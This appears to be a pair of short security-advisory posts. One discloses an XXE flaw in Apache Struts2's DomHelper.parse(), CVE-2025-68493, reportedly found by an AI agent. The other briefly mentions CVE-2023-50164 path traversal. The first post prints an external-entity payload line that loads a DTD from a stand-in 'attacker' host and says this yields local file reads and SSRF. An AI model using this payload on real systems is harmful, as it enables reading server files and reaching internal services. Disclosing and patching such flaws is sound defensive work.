CVE-2025-68493: Apache Struts2 XWork-Core XXE

Technical Breakdown: Our AI agent - ZAST.AI uncovered an XXE flaw in com.opensymphony.xwork2.util.DomHelper.parse(). The root cause is a raw SAXParserFactory initialization that lacks security feature flags: factory.setFeature("http://xml.org/sax/features/external-general-entities", false); // MISSING

Attack Vector: By manipulating the InputSource, an attacker can inject a malicious DTD.
- Payload: <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
- Result: Full LFI (e.g., /etc/passwd, win.ini) and SSRF capabilities.

Status: Assigned CVE-2025-68493.

Affects Struts2 <= 6.0.3. Patching is critical.

🔗 Vulnerability reports: https://cwiki.apache.org/confluence/display/WW/S2-069

#XXE #CyberSecurity #ZAST #CVE #ApacheStruts2

CVE-2023-50164 exposes a potential avenue for attackers to manipulate file upload parameters, thereby enabling path traversal.

#Cybersecurity #ApacheStruts2 #Vulnerability #RCE #Apache

https://cybersec84.wordpress.com/2023/12/10/critical-apache-struts-2-rce-vulnerability-patched-urgent-upgrade-recommended/